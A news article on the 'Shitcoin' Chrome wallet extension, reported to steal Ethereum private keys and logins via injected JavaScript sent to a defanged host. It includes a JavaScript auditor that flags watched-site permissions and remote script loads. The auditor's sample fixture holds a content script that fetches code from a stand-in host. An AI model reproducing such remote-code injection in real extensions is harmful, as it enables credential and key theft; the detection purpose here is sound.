There is a Chrome Extension Shitcoin Which Can Steal Your Crypto-Keys
The Internet is full of interesting tools and extensions. Some of them can be trusted, while a handful cannot.
Recently, we came across one such tool, called Shitcoin, which was released on the 9th of December. The extension was initially designed to secure Ethereum coins and ERC20 digital tokens. For those who aren’t familiar with these tokens, they help with the ICO.
For now, Shitcoin is trending among users who deal with the Ethereum cryptocurrency. Apparently, these users are not aware that this wallet can put their private information at risk. The Shitcoin wallet uses JavaScript code specifically designed to steal the passwords and private keys of users who make crypto-transactions with it. The wallet injects the JS code into other people’s website pages and then tracks that information to the source. It then copies the information and delivers it to the Shitcoin database. Users often install the Chrome extension in their browsers; those who aren’t fans of Chrome instead install the Windows desktop app and manage funds outside the browser.
Sadly, the wallet app is not what the organization’s CEO promised users it would be. According to Harry Denley, who is currently the Director of Security at the MyCrypto platform, the Ethereum wallet Shitcoin contains malicious code that injects itself into different websites unannounced. Denley also points out that the extension is harmful to people who rely on the wallet to secure funds in the form of Ethereum coins or ERC20-based tokens.
Denley revealed that the Shitcoin wallet is capable of sending the private key information of all its wallets to a third-party website located at the following address: erc20wallet[.]tk.
At the same time, the extension also injects JavaScript code when a user visits any of five popular cryptocurrency management platforms. The code is specifically designed to extract credentials and private keys. Here’s how the malicious code inflicts damage on users:
- Users install the Chrome extension
- Chrome extension requests permission to inject JavaScript (JS) code on 77 websites [listed here]
- When users navigate to any of these 77 sites, the extension loads and injects an additional JS file from https://erc20wallet[.]tk/js/content_.js
- This JS file contains obfuscated code [deobfuscated ]
- The code activates on five websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange
- Once activated, the malicious JS code records the user’s login credentials, searches for private keys stored inside the dashboards of the five services, and, finally, sends the data to erc20wallet[.]tk
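The install-and-inject sequence above leaves traces that can be checked statically before an extension is trusted. The following is an added example, not code from the article or from the extension: it audits a manifest and content script for host patterns reaching the five named services and for `.js` files loaded from a remote host. `auditExtension`, the sample manifest and the host `loader.example` are constructed for illustration.

```javascript
// Added example. Manifest, script text and loader.example are constructed.
// The five services the article says the injected code activates on.
const WATCHED_SITES = ["myetherwallet.com", "idex.market", "binance.org",
                       "neotracker.io", "switcheo.exchange"];

// Host part of a Chrome match pattern, e.g. "*://*.example.com/*".
// Returns null for API permissions such as "tabs" or "storage".
function patternHost(pattern) {
  if (pattern === "<all_urls>") return "*";
  const m = /^(?:\*|https?|wss?|ftp|file):\/\/([^\/]*)\//.exec(pattern);
  return m ? m[1].toLowerCase() : null;
}

// True when the pattern host reaches the site or one of its subdomains.
function targets(host, site) {
  if (host === "*") return true;
  const base = host.replace(/^\*\./, "");
  return base === site || base.endsWith("." + site);
}

// manifest: parsed manifest.json; sources: { fileName: scriptText }.
function auditExtension(manifest, sources) {
  const declared = [
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ];
  const hosts = [...new Set(declared)].map(patternHost).filter((h) => h !== null);
  const watchedHit = WATCHED_SITES.filter((s) => hosts.some((h) => targets(h, s)));
  // Heuristic: packaged scripts use relative paths, so an http(s) URL ending
  // in .js inside a content script is a candidate remote-code load to review.
  const urlRe = /https?:\/\/[a-z0-9.-]+\/[^\s"'`)]*\.js\b/gi;
  const remoteScripts = Object.entries(sources).flatMap(([file, code]) =>
    (code.match(urlRe) || []).map((url) => ({ file, url })));
  return { hostPatternCount: hosts.length, watchedHit, remoteScripts,
           suspicious: watchedHit.length > 0 && remoteScripts.length > 0 };
}

const SAMPLE_MANIFEST = {
  manifest_version: 2,
  permissions: ["storage", "tabs"],
  content_scripts: [{ js: ["content.js"], matches: [
    "*://*.myetherwallet.com/*", "https://www.binance.org/*", "*://news.example/*"] }],
};
const SAMPLE_SOURCES = { "content.js":
  'var s = document.createElement("script");\n' +
  's.src = "https://loader.example/js/content_.js";\n' +
  'document.head.appendChild(s);' };
console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES), null, 2));
```

A hit on both signals is a reason for manual review of the extension, not proof of theft; a legitimate extension can also reference remote URLs.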
It is not yet clear whether this code in Shitcoin Wallet was installed by the company itself or by a third party, but one thing is for sure: this particular Chrome extension has been compromised.
Users are best advised to first scan the website using a tool such as VirusTotal.